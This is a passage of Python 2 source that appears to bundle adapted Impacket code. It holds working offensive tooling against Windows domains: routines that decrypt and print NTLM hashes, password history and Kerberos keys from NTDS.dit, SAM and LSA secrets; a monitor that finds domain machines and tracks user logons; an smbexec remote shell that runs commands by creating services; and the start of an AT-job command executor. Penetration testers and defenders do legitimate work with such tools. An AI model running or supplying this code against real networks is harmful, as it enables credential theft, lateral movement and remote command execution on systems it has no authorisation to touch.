domain = record[self.NAME_TO_INTERNAL['userPrincipalName']].split('@')[-1]
userName = '%s\\%s' % (domain, record[self.NAME_TO_INTERNAL['sAMAccountName']])
else:
userName = '%s' % record[self.NAME_TO_INTERNAL['sAMAccountName']]
cipherText = self.CRYPTED_BLOB(record[self.NAME_TO_INTERNAL['supplementalCredentials']].decode('hex'))
plainText = self.__removeRC4Layer(cipherText)
try:
userProperties = samr.USER_PROPERTIES(plainText)
except:
# On some old w2k3 there might be user properties that don't
# match [MS-SAMR] structure, discarding them
return
propertiesData = userProperties['UserProperties']
for propertyCount in range(userProperties['PropertyCount']):
userProperty = samr.USER_PROPERTY(propertiesData)
propertiesData = propertiesData[len(userProperty):]
# For now, we will only process Newer Kerberos Keys.
if userProperty['PropertyName'].decode('utf-16le') == 'Primary:Kerberos-Newer-Keys':
propertyValueBuffer = userProperty['PropertyValue'].decode('hex')
kerbStoredCredentialNew = samr.KERB_STORED_CREDENTIAL_NEW(propertyValueBuffer)
data = kerbStoredCredentialNew['Buffer']
for credential in range(kerbStoredCredentialNew['CredentialCount']):
keyDataNew = samr.KERB_KEY_DATA_NEW(data)
data = data[len(keyDataNew):]
keyValue = propertyValueBuffer[keyDataNew['KeyOffset']:][:keyDataNew['KeyLength']]
if self.KERBEROS_TYPE.has_key(keyDataNew['KeyType']):
answer = "%s:%s:%s" % (userName, self.KERBEROS_TYPE[keyDataNew['KeyType']],keyValue.encode('hex'))
else:
answer = "%s:%s:%s" % (userName, hex(keyDataNew['KeyType']),keyValue.encode('hex'))
# We're just storing the keys, not printing them, to make the output more readable
# This is kind of ugly... but it's what I came up with tonight to get an ordered
# set :P. Better ideas welcomed ;)
self.__kerberosKeys[answer] = None
def __decryptHash(self, record):
logging.debug('Decrypting hash for user: %s' % record[self.NAME_TO_INTERNAL['name']])
sid = SAMR_RPC_SID(record[self.NAME_TO_INTERNAL['objectSid']].decode('hex'))
rid = sid.formatCanonical().split('-')[-1]
if record[self.NAME_TO_INTERNAL['dBCSPwd']] is not None:
encryptedLMHash = self.CRYPTED_HASH(record[self.NAME_TO_INTERNAL['dBCSPwd']].decode('hex'))
tmpLMHash = self.__removeRC4Layer(encryptedLMHash)
LMHash = self.__removeDESLayer(tmpLMHash, rid)
else:
LMHash = ntlm.LMOWFv1('','')
encryptedLMHash = None
if record[self.NAME_TO_INTERNAL['unicodePwd']] is not None:
encryptedNTHash = self.CRYPTED_HASH(record[self.NAME_TO_INTERNAL['unicodePwd']].decode('hex'))
tmpNTHash = self.__removeRC4Layer(encryptedNTHash)
NTHash = self.__removeDESLayer(tmpNTHash, rid)
else:
NTHash = ntlm.NTOWFv1('','')
encryptedNTHash = None
if record[self.NAME_TO_INTERNAL['userPrincipalName']] is not None:
domain = record[self.NAME_TO_INTERNAL['userPrincipalName']].split('@')[-1]
userName = '%s\\%s' % (domain, record[self.NAME_TO_INTERNAL['sAMAccountName']])
else:
userName = '%s' % record[self.NAME_TO_INTERNAL['sAMAccountName']]
answer = "%s:%s:%s:%s:::" % (userName, rid, LMHash.encode('hex'), NTHash.encode('hex'))
self.__hashesFound[record[self.NAME_TO_INTERNAL['objectSid']].decode('hex')] = answer
print answer
if self.__history:
LMHistory = []
NTHistory = []
if record[self.NAME_TO_INTERNAL['lmPwdHistory']] is not None:
lmPwdHistory = record[self.NAME_TO_INTERNAL['lmPwdHistory']]
encryptedLMHistory = self.CRYPTED_HISTORY(record[self.NAME_TO_INTERNAL['lmPwdHistory']].decode('hex'))
tmpLMHistory = self.__removeRC4Layer(encryptedLMHistory)
for i in range(0, len(tmpLMHistory)/16):
LMHash = self.__removeDESLayer(tmpLMHistory[i*16:(i+1)*16], rid)
LMHistory.append(LMHash)
if record[self.NAME_TO_INTERNAL['ntPwdHistory']] is not None:
ntPwdHistory = record[self.NAME_TO_INTERNAL['ntPwdHistory']]
encryptedNTHistory = self.CRYPTED_HISTORY(record[self.NAME_TO_INTERNAL['ntPwdHistory']].decode('hex'))
tmpNTHistory = self.__removeRC4Layer(encryptedNTHistory)
for i in range(0, len(tmpNTHistory)/16):
NTHash = self.__removeDESLayer(tmpNTHistory[i*16:(i+1)*16], rid)
NTHistory.append(NTHash)
for i, (LMHash, NTHash) in enumerate(map(lambda l,n: (l,n) if l else ('',n), LMHistory[1:], NTHistory[1:])):
if self.__noLMHash:
lmhash = ntlm.LMOWFv1('','').encode('hex')
else:
lmhash = LMHash.encode('hex')
answer = "%s_history%d:%s:%s:%s:::" % (userName, i, rid, lmhash, NTHash.encode('hex'))
self.__hashesFound[record[self.NAME_TO_INTERNAL['objectSid']].decode('hex')+str(i)] = answer
print answer
def dump(self):
if self.__NTDS is None:
# No NTDS.dit file provided
return
logging.info('Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)')
# We start getting rows from the table aiming at reaching
# the pekList. If we find users records we stored them
# in a temp list for later process.
self.__getPek()
if self.__PEK is not None:
logging.info('Pek found and decrypted: 0x%s' % self.__PEK.encode('hex'))
logging.info('Reading and decrypting hashes from %s ' % self.__NTDS)
# First of all, if we have users already cached, let's decrypt their hashes
for record in self.__tmpUsers:
try:
self.__decryptHash(record)
self.__decryptSupplementalInfo(record)
except Exception, e:
#import traceback
#print traceback.print_exc()
try:
logging.error("Error while processing row for user %s" % record[self.NAME_TO_INTERNAL['name']])
logging.error(str(e))
pass
except:
logging.error("Error while processing row!")
logging.error(str(e))
pass
# Now let's keep moving through the NTDS file and decrypting what we find
while True:
try:
record = self.__ESEDB.getNextRow(self.__cursor)
except:
logging.error('Error while calling getNextRow(), trying the next one')
continue
if record is None:
break
try:
if record[self.NAME_TO_INTERNAL['sAMAccountType']] in self.ACCOUNT_TYPES:
self.__decryptHash(record)
self.__decryptSupplementalInfo(record)
except Exception, e:
#import traceback
#print traceback.print_exc()
try:
logging.error("Error while processing row for user %s" % record[self.NAME_TO_INTERNAL['name']])
logging.error(str(e))
pass
except:
logging.error("Error while processing row!")
logging.error(str(e))
pass
# Now we'll print the Kerberos keys. So we don't mix things up in the output.
if len(self.__kerberosKeys) > 0:
logging.info('Kerberos keys from %s ' % self.__NTDS)
for itemKey in self.__kerberosKeys.keys():
print itemKey
def export(self, fileName):
if len(self.__hashesFound) > 0:
items = sorted(self.__hashesFound)
fd = open(fileName+'.ntds','w+')
for item in items:
try:
fd.write(self.__hashesFound[item]+'\n')
except Exception, e:
try:
logging.error("Error writing entry %d, skipping" % item)
except:
logging.error("Error writing entry, skipping")
pass
fd.close()
if len(self.__kerberosKeys) > 0:
fd = open(fileName+'.ntds.kerberos','w+')
for itemKey in self.__kerberosKeys.keys():
fd.write(itemKey+'\n')
fd.close()
def finish(self):
if self.__NTDS is not None:
self.__ESEDB.close()
class DumpSecrets:
def __init__(self, address, username = '', password = '', domain='', hashes = None, aesKey=None, doKerberos=False, system=False, security=False, sam=False, ntds=False, outputFileName = None, history=False):
self.__remoteAddr = address
self.__username = username
self.__password = password
self.__domain = domain
self.__lmhash = ''
self.__nthash = ''
self.__aesKey = aesKey
self.__smbConnection = None
self.__remoteOps = None
self.__SAMHashes = None
self.__NTDSHashes = None
self.__LSASecrets = None
self.__systemHive = system
self.__securityHive = security
self.__samHive = sam
self.__ntdsFile = ntds
self.__history = history
self.__noLMHash = True
self.__isRemote = True
self.__outputFileName = outputFileName
self.__doKerberos = doKerberos
if hashes is not None:
self.__lmhash, self.__nthash = hashes.split(':')
def connect(self):
self.__smbConnection = SMBConnection(self.__remoteAddr, self.__remoteAddr)
if self.__doKerberos:
self.__smbConnection.kerberosLogin(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash, self.__aesKey)
else:
self.__smbConnection.login(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)
def getBootKey(self):
# Local Version whenever we are given the files directly
bootKey = ''
tmpKey = ''
winreg = winregistry.Registry(self.__systemHive, self.__isRemote)
# We gotta find out the Current Control Set
currentControlSet = winreg.getValue('\\Select\\Current')[1]
currentControlSet = "ControlSet%03d" % currentControlSet
for key in ['JD','Skew1','GBG','Data']:
logging.debug('Retrieving class info for %s'% key)
ans = winreg.getClass('\\%s\\Control\\Lsa\\%s' % (currentControlSet,key))
digit = ans[:16].decode('utf-16le')
tmpKey = tmpKey + digit
transforms = [ 8, 5, 4, 2, 11, 9, 13, 3, 0, 6, 1, 12, 14, 10, 15, 7 ]
tmpKey = tmpKey.decode('hex')
for i in xrange(len(tmpKey)):
bootKey += tmpKey[transforms[i]]
logging.info('Target system bootKey: 0x%s' % bootKey.encode('hex'))
return bootKey
def checkNoLMHashPolicy(self):
logging.debug('Checking NoLMHash Policy')
winreg = winregistry.Registry(self.__systemHive, self.__isRemote)
# We gotta find out the Current Control Set
currentControlSet = winreg.getValue('\\Select\\Current')[1]
currentControlSet = "ControlSet%03d" % currentControlSet
#noLmHash = winreg.getValue('\\%s\\Control\\Lsa\\NoLmHash' % currentControlSet)[1]
noLmHash = winreg.getValue('\\%s\\Control\\Lsa\\NoLmHash' % currentControlSet)
if noLmHash is not None:
noLmHash = noLmHash[1]
else:
noLmHash = 0
if noLmHash != 1:
logging.debug('LMHashes are being stored')
return False
logging.debug('LMHashes are NOT being stored')
return True
def dump(self):
try:
if self.__remoteAddr.upper() == 'LOCAL' and self.__username == '':
self.__isRemote = False
bootKey = self.getBootKey()
if self.__ntdsFile is not None:
# Let's grab target's configuration about LM Hashes storage
self.__noLMHash = self.checkNoLMHashPolicy()
else:
self.__isRemote = True
self.connect()
self.__remoteOps = RemoteOperations(self.__smbConnection)
self.__remoteOps.enableRegistry()
bootKey = self.__remoteOps.getBootKey()
# Let's check whether target system stores LM Hashes
self.__noLMHash = self.__remoteOps.checkNoLMHashPolicy()
if self.__isRemote == True:
SAMFileName = self.__remoteOps.saveSAM()
else:
SAMFileName = self.__samHive
self.__SAMHashes = SAMHashes(SAMFileName, bootKey, isRemote = self.__isRemote)
self.__SAMHashes.dump()
if self.__outputFileName is not None:
self.__SAMHashes.export(self.__outputFileName)
if self.__isRemote == True:
SECURITYFileName = self.__remoteOps.saveSECURITY()
else:
SECURITYFileName = self.__securityHive
self.__LSASecrets= LSASecrets(SECURITYFileName, bootKey, self.__remoteOps, isRemote = self.__isRemote)
self.__LSASecrets.dumpCachedHashes()
if self.__outputFileName is not None:
self.__LSASecrets.exportCached(self.__outputFileName)
self.__LSASecrets.dumpSecrets()
if self.__outputFileName is not None:
self.__LSASecrets.exportSecrets(self.__outputFileName)
if self.__isRemote == True:
NTDSFileName = self.__remoteOps.saveNTDS()
else:
NTDSFileName = self.__ntdsFile
self.__NTDSHashes = NTDSHashes(NTDSFileName, bootKey, isRemote = self.__isRemote, history = self.__history, noLMHash = self.__noLMHash)
self.__NTDSHashes.dump()
if self.__outputFileName is not None:
self.__NTDSHashes.export(self.__outputFileName)
self.cleanup()
except (Exception, KeyboardInterrupt), e:
#import traceback
#print traceback.print_exc()
logging.error(e)
try:
self.cleanup()
except:
pass
def cleanup(self):
logging.info('Cleaning up... ')
if self.__remoteOps:
self.__remoteOps.finish()
if self.__SAMHashes:
self.__SAMHashes.finish()
if self.__LSASecrets:
self.__LSASecrets.finish()
if self.__NTDSHashes:
self.__NTDSHashes.finish()
if self.__isRemote == True:
self.__smbConnection.logoff()
'''
IMPACKET NETVIEW
'''
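# The classes below are adapted from Impacket's netview.py example: checkMachines()
# polls TCP/445 on candidate hosts in a background loop, while USERENUM enumerates
# domain machine accounts over SAMR and then watches SRVSVC (NetrSessionEnum) and
# WKSSVC (NetrWkstaUserEnum) on the live hosts to report session and logon activity.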
machinesAliveQueue = Queue()
machinesDownQueue = Queue()
myIP = None
def checkMachines(machines, stopEvent, singlePass=False):
origLen = len(machines)
deadMachines = machines
done = False
while not done:
if stopEvent.is_set():
done = True
break
for machine in deadMachines:
s = socket.socket()
try:
s = socket.create_connection((machine, 445), 2)
global myIP
myIP = s.getsockname()[0]
s.close()
machinesAliveQueue.put(machine)
except Exception, e:
logging.debug('%s: not alive (%s)' % (machine, e))
pass
else:
logging.debug('%s: alive!' % machine)
deadMachines.remove(machine)
if stopEvent.is_set():
done = True
break
logging.debug('up: %d, down: %d, total: %d' % (origLen-len(deadMachines), len(deadMachines), origLen))
if singlePass is True:
done = True
if not done:
time.sleep(10)
# Do we have some new deadMachines to add?
while machinesDownQueue.empty() is False:
deadMachines.append(machinesDownQueue.get())
class USERENUM:
def __init__(self, username = '', password = '', domain = '', hashes = None, aesKey = None, doKerberos=False, options=None):
self.__username = username
self.__password = password
self.__domain = domain
self.__lmhash = ''
self.__nthash = ''
self.__aesKey = aesKey
self.__doKerberos = doKerberos
self.__options = options
self.__machinesList = list()
self.__targets = dict()
self.__filterUsers = None
self.__targetsThreadEvent = None
self.__maxConnections = int(options.max_connections)
if hashes is not None:
self.__lmhash, self.__nthash = hashes.split(':')
def getDomainMachines(self):
if self.__options.domainController is not None:
domainController = self.__options.domainController
elif self.__domain != '':
domainController = self.__domain
else:
raise Exception('A domain is needed!')
logging.info('Getting machine\'s list from %s' % domainController)
rpctransport = transport.SMBTransport(domainController, 445, r'\samr', self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash, self.__aesKey, doKerberos = self.__doKerberos)
dce = rpctransport.get_dce_rpc()
dce.connect()
dce.bind(samr.MSRPC_UUID_SAMR)
try:
resp = samr.hSamrConnect(dce)
serverHandle = resp['ServerHandle']
resp = samr.hSamrEnumerateDomainsInSamServer(dce, serverHandle)
domains = resp['Buffer']['Buffer']
logging.info("Looking up users in domain %s" % domains[0]['Name'])
resp = samr.hSamrLookupDomainInSamServer(dce, serverHandle,domains[0]['Name'] )
resp = samr.hSamrOpenDomain(dce, serverHandle = serverHandle, domainId = resp['DomainId'])
domainHandle = resp['DomainHandle']
status = STATUS_MORE_ENTRIES
enumerationContext = 0
while status == STATUS_MORE_ENTRIES:
try:
resp = samr.hSamrEnumerateUsersInDomain(dce, domainHandle, samr.USER_WORKSTATION_TRUST_ACCOUNT, enumerationContext = enumerationContext)
except Exception, e:
if str(e).find('STATUS_MORE_ENTRIES') < 0:
raise
resp = e.get_packet()
for user in resp['Buffer']['Buffer']:
self.__machinesList.append(user['Name'][:-1])
logging.debug('Machine name - rid: %s - %d'% (user['Name'], user['RelativeId']))
enumerationContext = resp['EnumerationContext']
status = resp['ErrorCode']
except Exception, e:
raise e
dce.disconnect()
def getTargets(self):
logging.info('Importing targets')
if self.__options.target is None and self.__options.targets is None:
# We need to download the list of machines from the domain
self.getDomainMachines()
elif self.__options.targets is not None:
for line in self.__options.targets.readlines():
self.__machinesList.append(line.strip(' \r\n'))
else:
# Just a single machine
self.__machinesList.append(self.__options.target)
logging.info("Got %d machines" % len(self.__machinesList))
def filterUsers(self):
if self.__options.user is not None:
self.__filterUsers = list()
self.__filterUsers.append(self.__options.user)
elif self.__options.users is not None:
# Grab users list from a file
self.__filterUsers = list()
for line in self.__options.users.readlines():
self.__filterUsers.append(line.strip(' \r\n'))
else:
self.__filterUsers = None
def run(self):
self.getTargets()
self.filterUsers()
#self.filterGroups()
# Up to here we should have figured out the scope of our work
self.__targetsThreadEvent = Event()
if self.__options.noloop is False:
# Start a separate thread checking the targets that are up
self.__targetsThread = Thread(target=checkMachines, args=(self.__machinesList,self.__targetsThreadEvent))
self.__targetsThread.start()
else:
# Since it's gonna be a one-shot test, we need to wait till it finishes
checkMachines(self.__machinesList,self.__targetsThreadEvent, singlePass=True)
while True:
# Do we have more machines to add?
while machinesAliveQueue.empty() is False:
machine = machinesAliveQueue.get()
logging.debug('Adding %s to the up list' % machine)
self.__targets[machine] = {}
self.__targets[machine]['SRVS'] = None
self.__targets[machine]['WKST'] = None
self.__targets[machine]['Admin'] = True
self.__targets[machine]['Sessions'] = list()
self.__targets[machine]['LoggedIn'] = set()
for target in self.__targets.keys():
try:
self.getSessions(target)
self.getLoggedIn(target)
except (SessionError, DCERPCException), e:
# We will silently pass these ones, might be issues with Kerberos, or DCE
if str(e).find('LOGON_FAILURE') >=0:
# For some reason our credentials don't work there,
# taking it out from the list.
logging.error('STATUS_LOGON_FAILURE for %s, discarding' % target)
del(self.__targets[target])
elif str(e).find('INVALID_PARAMETER') >=0:
del(self.__targets[target])
elif str(e).find('access_denied') >=0:
# Can't access the target RPC call, most probably a Unix host
# taking it out from the list
del(self.__targets[target])
else:
logging.info(str(e))
pass
except KeyboardInterrupt:
raise
except Exception, e:
#import traceback
#print traceback.print_exc()
if str(e).find('timed out') >=0:
# Most probably this site went down. taking it out
# ToDo: add it back to the list of machines to check in
# the separate thread - DONE
del(self.__targets[target])
machinesDownQueue.put(target)
else:
# These ones we will report
logging.error(e)
pass
if self.__options.noloop is True:
break
logging.debug('Sleeping for %s seconds' % self.__options.delay)
logging.debug('Currently monitoring %d active targets' % len(self.__targets))
time.sleep(int(self.__options.delay))
def getSessions(self, target):
if self.__targets[target]['SRVS'] is None:
stringSrvsBinding = r'ncacn_np:%s[\PIPE\srvsvc]' % target
rpctransportSrvs = transport.DCERPCTransportFactory(stringSrvsBinding)
if hasattr(rpctransportSrvs, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransportSrvs.set_credentials(self.__username,self.__password, self.__domain, self.__lmhash, self.__nthash, self.__aesKey)
rpctransportSrvs.set_kerberos(self.__doKerberos)
dce = rpctransportSrvs.get_dce_rpc()
dce.connect()
dce.bind(srvs.MSRPC_UUID_SRVS)
self.__maxConnections -= 1
else:
dce = self.__targets[target]['SRVS']
try:
resp = srvs.hNetrSessionEnum(dce, '\x00', NULL, 10)
except Exception, e:
if str(e).find('Broken pipe') >= 0:
# The connection timed-out. Let's try to bring it back next round
self.__targets[target]['SRVS'] = None
self.__maxConnections += 1
return
else:
raise
if self.__maxConnections < 0:
# Can't keep this connection open. Closing it
dce.disconnect()
self.__maxConnections = 0
else:
self.__targets[target]['SRVS'] = dce
# Let's see who created a connection since last check
tmpSession = list()
printCRLF = False
for session in resp['InfoStruct']['SessionInfo']['Level10']['Buffer']:
userName = session['sesi10_username'][:-1]
sourceIP = session['sesi10_cname'][:-1][2:]
key = '%s\x01%s' % (userName, sourceIP)
myEntry = '%s\x01%s' % (self.__username, myIP)
tmpSession.append(key)
if not(key in self.__targets[target]['Sessions']):
# Skipping myself
if key != myEntry:
self.__targets[target]['Sessions'].append(key)
# Are we filtering users?
if self.__filterUsers is not None:
if userName in self.__filterUsers:
print "%s: user %s logged from host %s - active: %d, idle: %d" % (target,userName, sourceIP, session['sesi10_time'], session['sesi10_idle_time'])
printCRLF=True
else:
print "%s: user %s logged from host %s - active: %d, idle: %d" % (target,userName, sourceIP, session['sesi10_time'], session['sesi10_idle_time'])
printCRLF=True
# Let's see who deleted a connection since last check
for nItem, session in enumerate(self.__targets[target]['Sessions']):
userName, sourceIP = session.split('\x01')
if session not in tmpSession:
del(self.__targets[target]['Sessions'][nItem])
# Are we filtering users?
if self.__filterUsers is not None:
if userName in self.__filterUsers:
print "%s: user %s logged off from host %s" % (target, userName, sourceIP)
printCRLF=True
else:
print "%s: user %s logged off from host %s" % (target, userName, sourceIP)
printCRLF=True
if printCRLF is True:
print
def getLoggedIn(self, target):
if self.__targets[target]['Admin'] is False:
return
if self.__targets[target]['WKST'] is None:
stringWkstBinding = r'ncacn_np:%s[\PIPE\wkssvc]' % target
rpctransportWkst = transport.DCERPCTransportFactory(stringWkstBinding)
if hasattr(rpctransportWkst, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransportWkst.set_credentials(self.__username,self.__password, self.__domain, self.__lmhash, self.__nthash, self.__aesKey)
rpctransportWkst.set_kerberos(self.__doKerberos)
dce = rpctransportWkst.get_dce_rpc()
dce.connect()
dce.bind(wkst.MSRPC_UUID_WKST)
self.__maxConnections -= 1
else:
dce = self.__targets[target]['WKST']
try:
resp = wkst.hNetrWkstaUserEnum(dce,1)
except Exception, e:
if str(e).find('Broken pipe') >= 0:
# The connection timed-out. Let's try to bring it back next round
self.__targets[target]['WKST'] = None
self.__maxConnections += 1
return
elif str(e).upper().find('ACCESS_DENIED') >= 0:
# We're not admin, bye
dce.disconnect()
self.__maxConnections += 1
self.__targets[target]['Admin'] = False
return
else:
raise
if self.__maxConnections < 0:
# Can't keep this connection open. Closing it
dce.disconnect()
self.__maxConnections = 0
else:
self.__targets[target]['WKST'] = dce
# Let's see who logged in locally since last check
tmpLoggedUsers = set()
printCRLF = False
for session in resp['UserInfo']['WkstaUserInfo']['Level1']['Buffer']:
userName = session['wkui1_username'][:-1]
logonDomain = session['wkui1_logon_domain'][:-1]
key = '%s\x01%s' % (userName, logonDomain)
tmpLoggedUsers.add(key)
if not(key in self.__targets[target]['LoggedIn']):
self.__targets[target]['LoggedIn'].add(key)
# Are we filtering users?
if self.__filterUsers is not None:
if userName in self.__filterUsers:
print "%s: user %s\\%s logged in LOCALLY" % (target,logonDomain,userName)
printCRLF=True
else:
print "%s: user %s\\%s logged in LOCALLY" % (target,logonDomain,userName)
printCRLF=True
# Let's see who logged out since last check
for session in self.__targets[target]['LoggedIn'].copy():
userName, logonDomain = session.split('\x01')
if session not in tmpLoggedUsers:
self.__targets[target]['LoggedIn'].remove(session)
# Are we filtering users?
if self.__filterUsers is not None:
if userName in self.__filterUsers:
print "%s: user %s\\%s logged off LOCALLY" % (target,logonDomain,userName)
printCRLF=True
else:
print "%s: user %s\\%s logged off LOCALLY" % (target,logonDomain,userName)
printCRLF=True
if printCRLF is True:
print
def stop(self):
if self.__targetsThreadEvent is not None:
self.__targetsThreadEvent.set()
'''
IMPACKET SMBEXEC
'''
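# Adapted from Impacket's smbexec.py: each command is wrapped in a batch file and run
# as a short-lived service through SVCCTL, with its output redirected either to a share
# on the target ('SHARE' mode) or copied back to the local SMBServer below ('SERVER' mode).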
SMBEXEC_OUTPUT_FILENAME = '__output'
SMBEXEC_BATCH_FILENAME = 'execute.bat'
SMBEXEC_SMBSERVER_DIR = '__tmp'
SMBEXEC_DUMMY_SHARE = 'TMP'
class SMBServer(Thread):
def __init__(self):
Thread.__init__(self)
def cleanup_server(self):
logging.info('Cleaning up..')
try:
os.unlink(SMBEXEC_SMBSERVER_DIR + '/smb.log')
except:
pass
os.rmdir(SMBEXEC_SMBSERVER_DIR)
def run(self):
# Here we write a mini config for the server
smbConfig = ConfigParser.ConfigParser()
smbConfig.add_section('global')
smbConfig.set('global','server_name','server_name')
smbConfig.set('global','server_os','UNIX')
smbConfig.set('global','server_domain','WORKGROUP')
smbConfig.set('global','log_file',SMBEXEC_SMBSERVER_DIR + '/smb.log')
smbConfig.set('global','credentials_file','')
# Let's add a dummy share
smbConfig.add_section(SMBEXEC_DUMMY_SHARE)
smbConfig.set(SMBEXEC_DUMMY_SHARE,'comment','')
smbConfig.set(SMBEXEC_DUMMY_SHARE,'read only','no')
smbConfig.set(SMBEXEC_DUMMY_SHARE,'share type','0')
smbConfig.set(SMBEXEC_DUMMY_SHARE,'path',SMBEXEC_SMBSERVER_DIR)
# IPC always needed
smbConfig.add_section('IPC$')
smbConfig.set('IPC$','comment','')
smbConfig.set('IPC$','read only','yes')
smbConfig.set('IPC$','share type','3')
smbConfig.set('IPC$','path','')
self.smb = smbserver.SMBSERVER(('0.0.0.0',445), config_parser = smbConfig)
logging.info('Creating tmp directory')
try:
os.mkdir(SMBEXEC_SMBSERVER_DIR)
except Exception, e:
logging.critical(str(e))
pass
logging.info('Setting up SMB Server')
self.smb.processConfigFile()
logging.info('Ready to listen...')
try:
self.smb.serve_forever()
except:
pass
def stop(self):
self.cleanup_server()
self.smb.socket.close()
self.smb.server_close()
self._Thread__stop()
class CMDEXEC:
KNOWN_PROTOCOLS = {
'139/SMB': (r'ncacn_np:%s[\pipe\svcctl]', 139),
'445/SMB': (r'ncacn_np:%s[\pipe\svcctl]', 445),
}
def __init__(self, protocols = None,
username = '', password = '', domain = '', hashes = None, aesKey = None, doKerberos = None, mode = None, share = None):
if not protocols:
protocols = CMDEXEC.KNOWN_PROTOCOLS.keys()
self.__username = username
self.__password = password
self.__protocols = [protocols]
self.__serviceName = 'BTOBTO'
self.__domain = domain
self.__lmhash = ''
self.__nthash = ''
self.__aesKey = aesKey
self.__doKerberos = doKerberos
self.__share = share
self.__mode = mode
if hashes is not None:
self.__lmhash, self.__nthash = hashes.split(':')
def run(self, addr):
for protocol in self.__protocols:
protodef = CMDEXEC.KNOWN_PROTOCOLS[protocol]
port = protodef[1]
logging.info("Trying protocol %s..." % protocol)
logging.info("Creating service %s..." % self.__serviceName)
stringbinding = protodef[0] % addr
rpctransport = transport.DCERPCTransportFactory(stringbinding)
rpctransport.set_dport(port)
if hasattr(rpctransport,'preferred_dialect'):
rpctransport.preferred_dialect(SMB_DIALECT)
if hasattr(rpctransport, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransport.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash, self.__aesKey)
rpctransport.set_kerberos(self.__doKerberos)
self.shell = None
try:
if self.__mode == 'SERVER':
serverThread = SMBServer()
serverThread.daemon = True
serverThread.start()
self.shell = SmbexecRemoteShell(self.__share, rpctransport, self.__mode, self.__serviceName)
self.shell.cmdloop()
if self.__mode == 'SERVER':
serverThread.stop()
except (Exception, KeyboardInterrupt), e:
#import traceback
#traceback.print_exc()
logging.critical(str(e))
if self.shell is not None:
self.shell.finish()
sys.stdout.flush()
sys.exit(1)
class SmbexecRemoteShell(cmd.Cmd):
def __init__(self, share, rpc, mode, serviceName):
cmd.Cmd.__init__(self)
self.__share = share
self.__mode = mode
self.__output = '\\Windows\\Temp\\' + SMBEXEC_OUTPUT_FILENAME
self.__batchFile = '%TEMP%\\' + SMBEXEC_BATCH_FILENAME
self.__outputBuffer = ''
self.__command = ''
self.__shell = '%COMSPEC% /Q /c '
self.__serviceName = serviceName
self.__rpc = rpc
self.intro = '[!] Launching semi-interactive shell - Careful what you execute'
self.__scmr = rpc.get_dce_rpc()
try:
self.__scmr.connect()
except Exception, e:
logging.critical(str(e))
sys.exit(1)
s = rpc.get_smb_connection()
# We don't wanna deal with timeouts from now on.
s.setTimeout(100000)
if mode == 'SERVER':
myIPaddr = s.getSMBServer().get_socket().getsockname()[0]
self.__copyBack = 'copy %s \\\\%s\\%s' % (self.__output, myIPaddr, SMBEXEC_DUMMY_SHARE)
self.__scmr.bind(scmr.MSRPC_UUID_SCMR)
resp = scmr.hROpenSCManagerW(self.__scmr)
self.__scHandle = resp['lpScHandle']
self.transferClient = rpc.get_smb_connection()
self.do_cd('')
def finish(self):
# Just in case the service is still created
try:
self.__scmr = self.__rpc.get_dce_rpc()
self.__scmr.connect()
self.__scmr.bind(svcctl.MSRPC_UUID_SVCCTL)
resp = scmr.hROpenSCManagerW(self.__scmr)
self.__scHandle = resp['lpScHandle']
resp = scmr.hROpenServiceW(self.__scmr, self.__scHandle, self.__serviceName)
service = resp['lpServiceHandle']
scmr.hRDeleteService(self.__scmr, service)
scmr.hRControlService(self.__scmr, service, scmr.SERVICE_CONTROL_STOP)
scmr.hRCloseServiceHandle(self.__scmr, service)
except Exception, e:
pass
def do_shell(self, s):
os.system(s)
def do_exit(self, s):
return True
def emptyline(self):
return False
def do_cd(self, s):
# We just can't CD or keep track of the target dir.
if len(s) > 0:
logging.error("You can't CD under SMBEXEC. Use full paths.")
self.execute_remote('cd ' )
if len(self.__outputBuffer) > 0:
# Stripping CR/LF
self.prompt = string.replace(self.__outputBuffer,'\r\n','') + '>'
self.__outputBuffer = ''
def do_CD(self, s):
return self.do_cd(s)
def default(self, line):
if line != '':
self.send_data(line)
def get_output(self):
def output_callback(data):
self.__outputBuffer += data
if self.__mode == 'SHARE':
self.transferClient.getFile(self.__share, self.__output, output_callback)
self.transferClient.deleteFile(self.__share, self.__output)
else:
fd = open(SMBEXEC_SMBSERVER_DIR + '/' + SMBEXEC_OUTPUT_FILENAME,'r')
output_callback(fd.read())
fd.close()
os.unlink(SMBEXEC_SMBSERVER_DIR + '/' + SMBEXEC_OUTPUT_FILENAME)
def execute_remote(self, data):
command = self.__shell + 'echo ' + data + ' ^> ' + self.__output + ' 2^>^&1 > ' + self.__batchFile + ' & ' + self.__shell + self.__batchFile
if self.__mode == 'SERVER':
command += ' & ' + self.__copyBack
command += ' & ' + 'del ' + self.__batchFile
resp = scmr.hRCreateServiceW(self.__scmr, self.__scHandle, self.__serviceName, self.__serviceName, lpBinaryPathName=command)
service = resp['lpServiceHandle']
try:
scmr.hRStartServiceW(self.__scmr, service)
except:
pass
scmr.hRDeleteService(self.__scmr, service)
scmr.hRCloseServiceHandle(self.__scmr, service)
self.get_output()
def send_data(self, data):
self.execute_remote(data)
print self.__outputBuffer
self.__outputBuffer = ''
'''
IMPACKET ATEXEC
'''
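# Adapted from Impacket's atexec.py: the command is registered as a scheduled job over
# the AT service (ATSVC/TSS pipes), run once, and its redirected output is pulled back
# from the target's ADMIN$\Temp share before the job and the temp file are removed.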
class ATSVC_EXEC:
KNOWN_PROTOCOLS = {
'139/SMB': (r'ncacn_np:%s[\pipe\atsvc]', 139),
'445/SMB': (r'ncacn_np:%s[\pipe\atsvc]', 445),
}
def __init__(self, username = '', password = '', domain = '', hashes = None, command = None, proto = None):
self.__username = username
self.__password = password
self.__protocols = ATSVC_EXEC.KNOWN_PROTOCOLS.keys()
self.__proto = proto
self.__domain = domain
self.__lmhash = ''
self.__nthash = ''
self.__command = command
if hashes is not None:
self.__lmhash, self.__nthash = hashes.split(':')
def play(self, addr):
# Try all requested protocols until one works.
entries = []
if "139/SMB" in self.__proto:
protodef = (r'ncacn_np:%s[\pipe\atsvc]', 139)
port = protodef[1]
protocol = self.__proto
self.atexec_run(protocol, addr, port, protodef)
elif "445/SMB" in self.__proto:
protodef = (r'ncacn_np:%s[\pipe\atsvc]', 445)
port = protodef[1]
protocol = self.__proto
